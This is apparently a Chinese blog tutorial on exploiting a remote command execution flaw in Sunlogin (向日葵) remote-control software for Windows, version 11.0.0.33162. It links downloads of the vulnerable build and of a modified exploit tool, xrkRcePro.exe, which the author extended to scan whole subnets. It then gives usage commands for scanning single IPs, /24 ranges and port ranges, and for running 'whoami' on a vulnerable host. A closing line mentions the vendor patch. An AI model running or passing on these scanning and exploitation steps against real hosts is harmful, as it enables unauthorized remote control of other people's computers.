0x01 漏洞简介
向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。
上海贝锐信息科技股份有限公司向日葵的简约版和个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
影响范围:
向日葵个人版 for Windows 演示环境为存在漏洞向日葵版本v11.0.0.33162 ,漏洞检测利用工具是来自TRY大佬写的工具,博主在其基础上修改了下部分源码,新增支持了网段检测漏洞功能。向日葵漏洞版本:11.0.0.33162 点击下载 提取码qm7u向日葵RCE工具修改版:点击下载 提取码:
vnp50x03 漏洞利用
漏洞检测利用工具修改版使用命令如下:
代码语言:javascript代码运行次数:0运行复制╔═╗┬ ┬┌┐┌╦ ┌─┐┌─┐┬┌┐┌ ╦═╗┌─┐┌─┐╚═╗│ ││││║ │ ││ ┬││││───╠╦╝│ ├┤╚═╝└─┘┘└┘╩═╝└─┘└─┘┴┘└┘ ╩╚═└─┘└─┘ by:T00ls.net 向日葵Rce 修改版 支持IP、网段检测----------------------------------------------Usage of xrkRcePro.exe: -c string 指定命令 -h string 支持IP(x.x.x.x) 网段(x.x.x.0/24) -p string 指定端口 (default "1-65535") -t string 指定类型:scan rce (default "scan") -x int 检测速度 (default 2000)
检测某目标是否存在漏洞:
代码语言:javascript代码运行次数:0运行复制xrkRcePro -h 10.211.55.3 -t scan
检测某网段是否存在漏洞:
代码语言:javascript代码运行次数:0运行复制
xrkRcePro -h 10.211.55.0/24 -t scan
默认扫描全端口:1-65535,可以根据实际场景指定端口范围
代码语言:javascript代码运行次数:0运行复制xrkRcePro -h 10.211.55.3 -t scan -p 50000-60000
默认检测速度是2000,可以根据实际场景选择检测速度:
代码语言:javascript代码运行次数:0运行复制xrkRcePro -h 10.211.55.0/24 -t scan -x 8000
检测到目标及端口号存在漏洞,利用RCE工具远程执行命令
代码语言:javascript代码运行次数:0运行复制xrkRcePro -h 10.211.55.3 -t rce -p 50164 -c "whoami"
厂商已发布了漏洞修复程序,请及时关注更新:https://sunlogin.oray.com/
参考文章https://mp.weixin.qq.com/s/25LqiXhqgEz_yHPdd9vPVw
